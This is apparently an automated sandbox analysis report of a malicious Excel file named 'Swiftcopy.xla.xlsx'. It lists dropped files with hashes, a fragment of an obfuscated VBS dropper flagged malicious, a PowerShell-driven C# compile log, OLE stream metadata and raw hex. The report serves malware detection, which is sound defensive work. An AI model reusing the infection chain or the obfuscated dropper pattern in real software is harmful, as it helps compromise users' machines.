                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~.Hg...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....|.....|...........................#.............. =.....P ......O.........U.....].....e.....l.....s...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.rp

                                                                      C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.out

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                      Category:modified
                                                                      Size (bytes):866
                                                                      Entropy (8bit):5.33552668247284
                                                                      Encrypted:false
                                                                      SSDEEP:24:AId3ka6KzVEoUKaMD5DqBVKVrdFAMBJTH:Akka60VEoUKdDcVKdBJj
                                                                      MD5:6DF2DABF93519D145543DFCC4F3E6514
                                                                      SHA1:100C5D3F0D715A2AFBEB14BFD0514427ABE9B6B1
                                                                      SHA-256:794A7AAF8A06799D85404672583DF476DF0BDDEFD3C1ECF3714E9D7626B4EE96
                                                                      SHA-512:54CF70737BEDB1370DF28C7B07DDB6FF5A3B3CD6DF56913CB1A90D5546D54DF65A64D8E404CE5277BD44C8AB50212CD712A879595E8D866510AE0F7EDA3FC8E7
                                                                      Malicious:false
                                                                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\rpgvm2d4\rpgvm2d4.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                      C:\Users\user\AppData\Local\Temp\~DF653D0D926A3EE94B.TMP

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):512
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3::
                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                      Malicious:false
                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\~DF7D03527D6BE5DBF8.TMP

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):512
                                                                      Entropy (8bit):0.0
                                                                      Encrypted:false
                                                                      SSDEEP:3::
                                                                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                      Malicious:false
                                                                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Roaming\seemebestthingswithentirethingswithgreatnaturething.vbS

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (429), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):166446
                                                                      Entropy (8bit):3.894631434751547
                                                                      Encrypted:false
                                                                      SSDEEP:3072:zPTYr5SAsQ5NIUHFlPTYr5SAsQ5NIUH5PTYr5SAsQ5NIUH2:zPTs5SANIUllPTs5SANIUZPTs5SANIUW
                                                                      MD5:33ACA5E4AA52362C54EA2A709581C47B
                                                                      SHA1:5FE650034F1FBE7C15477ECD16D2E95D14505C4A
                                                                      SHA-256:832FCD0838977003D89333EC7A0EAE20E9B00BB5DA21047F93FBECC793B2A03E
                                                                      SHA-512:64AA6372746DCD76178A0759CB12C95F31F31B748D8403CF7083512C6F606B065B78850EAED6BBECFCB7FCF1DE6C32A8B6CF5D620B0969E554A2378F6A2F3F61
                                                                      Malicious:true
                                                                      Preview:..........K.L.c.v.K.W.Z.L.L.B.G.B.g.i.L. .=. .".K.W.t.r.i.c.l.i.n.i.a.r.c.h.a.L.j.x.m.q.A.c.A.U.a.r.".....g.b.h.x.G.P.p.K.m.U.o.b.W.Q.p. .=. .".c.c.W.b.N.W.k.O.k.i.L.U.i.H.A.".....S.A.K.N.t.n.e.k.A.P.U.W.L.z.z. .=. .".b.W.K.i.B.K.h.H.G.e.d.d.C.K.b.".....m.W.a.J.a.m.o.P.p.v.Z.h.N.i.k. .=. .".z.o.S.A.K.n.d.O.e.W.q.G.O.L.c.".....K.C.I.L.a.b.R.x.P.J.W.t.G.u.g. .=. .".S.H.f.g.J.R.L.e.c.Z.P.c.i.r.i.".....K.c.b.L.x.L.p.a.c.t.h.u.W.b.Z. .=. .".I.p.h.W.p.m.h.g.G.B.d.K.J.q.B.".........L.d.G.W.A.a.h.k.c.P.L.L.k.W.P. .=. .".A.L.K.f.W.b.z.c.K.G.m.O.J.m.W.".....c.K.i.Q.W.W.n.v.I.L.l.L.W.C.u. .=. .".W.Z.m.G.q.q.L.t.i.L.Z.R.K.J.c.".....t.p.c.W.P.n.P.W.G.H.P.d.O.m.K. .=. .".o.R.R.C.N.W.e.U.e.L.z.L.v.p.O.".........s.U.A.l.H.k.x.L.g.G.K.k.o.c.u. .=. .".k.i.m.A.j.I.i.e.x.L.q.P.l.x.u.".....Z.l.L.A.i.K.T.p.c.R.K.L.I.K.i. .=. .".K.g.W.h.p.d.B.a.K.K.L.h.K.C.u.".....o.m.L.L.m.L.C.j.z.U.L.z.L.B.A. .=. .".W.m.u.W.v.B.W.g.L.z.h.O.h.c.L.".....j.c.q.S.W.c.O.Z.W.p.N.A.i.u.t. .=. .".d.z.G.h.L.Z.h.L.A.J.k.W.N.h.W."...

                                                                      C:\Users\user\Desktop\73B30000

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Nov 28 06:28:21 2024, Security: 1
                                                                      Category:dropped
                                                                      Size (bytes):1148928
                                                                      Entropy (8bit):7.638539791384039
                                                                      Encrypted:false
                                                                      SSDEEP:24576:W0qGxoHlWIuWzEhMBv3bVp2CpQJ0bylZ7gLRh:pqNhN/53bV+6IZ7gl
                                                                      MD5:42D0BBF4A4F8BD59A2E907E35EA1F67A
                                                                      SHA1:C6EBC224C5B2FBD4757F6BD7EC223151B730B148
                                                                      SHA-256:40C6B65C0794B7139A0F6D08D91380337666634BEF0BDE1EBEA90D68A593BA20
                                                                      SHA-512:B4A489F9BCD5DF253BDA7E2F9DEB2EE14E1B9F46174B3FBA58EC5536EC4AD5E6B1EA0244ABB965F56FFB0C785929CA551189A88F343F0E08024FD87773D84372
                                                                      Malicious:false
                                                                      Preview:......................>...............................................................................Q.......................t.......v.......x........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                      C:\Users\user\Desktop\73B30000:Zone.Identifier

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:false
                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                      C:\Users\user\Desktop\Swiftcopy.xla.xls (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Nov 28 06:28:21 2024, Security: 1
                                                                      Category:dropped
                                                                      Size (bytes):1148928
                                                                      Entropy (8bit):7.638539791384039
                                                                      Encrypted:false
                                                                      SSDEEP:24576:W0qGxoHlWIuWzEhMBv3bVp2CpQJ0bylZ7gLRh:pqNhN/53bV+6IZ7gl
                                                                      MD5:42D0BBF4A4F8BD59A2E907E35EA1F67A
                                                                      SHA1:C6EBC224C5B2FBD4757F6BD7EC223151B730B148
                                                                      SHA-256:40C6B65C0794B7139A0F6D08D91380337666634BEF0BDE1EBEA90D68A593BA20
                                                                      SHA-512:B4A489F9BCD5DF253BDA7E2F9DEB2EE14E1B9F46174B3FBA58EC5536EC4AD5E6B1EA0244ABB965F56FFB0C785929CA551189A88F343F0E08024FD87773D84372
                                                                      Malicious:false
                                                                      Preview:......................>...............................................................................Q.......................t.......v.......x........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                      C:\Users\user\Desktop\~$Swiftcopy.xla.xlsx

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):165
                                                                      Entropy (8bit):1.4377382811115937
                                                                      Encrypted:false
                                                                      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                      MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                      Malicious:true
                                                                      Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                      Static File Info

                                                                      General

                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 27 07:11:39 2024, Security: 1
                                                                      Entropy (8bit):7.619369630824882
                                                                      TrID:
                                                                      • Microsoft Excel sheet (30009/1) 47.99%
                                                                      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                      File name:Swiftcopy.xla.xlsx
                                                                      File size:1'158'144 bytes
                                                                      MD5:286b0bc4d52a6d17815a7724e03e980a
                                                                      SHA1:e0a09d030b4f7d5839cb1b1a9c981d5c36e1ad47
                                                                      SHA256:4b125219e5ef649021f0599e73be512a80d987ff8224036445c15fbd684c07c4
                                                                      SHA512:a6c37f7ebbe8d6f482daeb90277e9831e0fcb6446bad4abdfcfd45a619f8a205c8fe450f85c4edf8eb04803c9cf7a3840e4a1c0b7ef12eed17314d232f959ea1
                                                                      SSDEEP:24576:h0qGxoHlWIuWzPxiBl3bVkIflRP+cepnSqbsFQHTmn:SqNhNsD3bVdP1eoQq
                                                                      TLSH:FF35F1A1A6438A4ED595033540F38A9E261DDC825B5EF63B3118B34D7FB0E970B8F636
                                                                      File Content Preview:........................>...............................................................................Q.......................u.......w.......y..............................................................................................................

                                                                      File Icon

                                                                      Icon Hash:2562ab89a7b7bfbf

                                                                      Static OLE Info

                                                                      General

                                                                      Document Type:OLE
                                                                      Number of OLE Files:1

                                                                      OLE File "Swiftcopy.xla.xlsx"

                                                                      Indicators
                                                                      Has Summary Info:
                                                                      Application Name:Microsoft Excel
                                                                      Encrypted Document:True
                                                                      Contains Word Document Stream:False
                                                                      Contains Workbook/Book Stream:True
                                                                      Contains PowerPoint Document Stream:False
                                                                      Contains Visio Document Stream:False
                                                                      Contains ObjectPool Stream:False
                                                                      Flash Objects Count:0
                                                                      Contains VBA Macros:True
                                                                      Summary
                                                                      Code Page:1252
                                                                      Author:
                                                                      Last Saved By:
                                                                      Create Time:2006-09-16 00:00:00
                                                                      Last Saved Time:2024-11-27 07:11:39
                                                                      Creating Application:Microsoft Excel
                                                                      Security:1
                                                                      Document Summary
                                                                      Document Code Page:1252
                                                                      Thumbnail Scaling Desired:False
                                                                      Contains Dirty Links:False
                                                                      Shared Document:False
                                                                      Changed Hyperlinks:False
                                                                      Application Version:786432

                                                                      Streams with VBA

                                                                      VBA File Name: Sheet1.cls, Stream Size: 977
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                      VBA File Name:Sheet1.cls
                                                                      Stream Size:977
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E { . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 f5 45 7b 9d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      VBA Code
                                                                      Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                      VBA File Name: Sheet2.cls, Stream Size: 977
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                      VBA File Name:Sheet2.cls
                                                                      Stream Size:977
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E } . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 f5 45 7d 9d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      VBA Code
                                                                      Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                      VBA File Name: Sheet3.cls, Stream Size: 977
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                      VBA File Name:Sheet3.cls
                                                                      Stream Size:977
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 f5 45 e3 a5 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      VBA Code
                                                                      Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                      VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                      VBA File Name:ThisWorkbook.cls
                                                                      Stream Size:985
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 f5 45 ac 2e 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      VBA Code
                                                                      Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                      Streams

                                                                      Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                      General
                                                                      Stream Path:\x1CompObj
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:114
                                                                      Entropy:4.25248375192737
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                      General
                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:244
                                                                      Entropy:2.889430592781307
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                                      General
                                                                      Stream Path:\x5SummaryInformation
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:200
                                                                      Entropy:3.285842543212684
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . F @ . . . . . . . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                      Stream Path: MBD003994AB/\x1CompObj, File Type: data, Stream Size: 114
                                                                      General
                                                                      Stream Path:MBD003994AB/\x1CompObj
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:114
                                                                      Entropy:4.25248375192737
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Stream Path: MBD003994AB/\x5DocumentSummaryInformation, File Type: data, Stream Size: 248
                                                                      General
                                                                      Stream Path:MBD003994AB/\x5DocumentSummaryInformation
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:248
                                                                      Entropy:2.8688274782657706
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W a l s h i p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 68 00 00 00 0b 00 00 00 70 00 00 00 10 00 00 00 78 00 00 00 13 00 00 00 80 00 00 00 16 00 00 00 88 00 00 00 0d 00 00 00 90 00 00 00 0c 00 00 00 a3 00 00 00
                                                                      Stream Path: MBD003994AB/\x5SummaryInformation, File Type: dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\355\355\355PPP\374\374\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", Stream Size: 117868
                                                                      General
                                                                      Stream Path:MBD003994AB/\x5SummaryInformation
                                                                      CLSID:
                                                                      File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\355\355\355PPP\374\374\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
                                                                      Stream Size:117868
                                                                      Entropy:3.7414491791536952
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . < . . . . . . . . . . P . . . . . . . X . . . . . . . l . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P c W a l s h i p . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . 7 . @ . . . . . @ . . . . < z 3 . . . . . . . . . G . . . t . . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . .
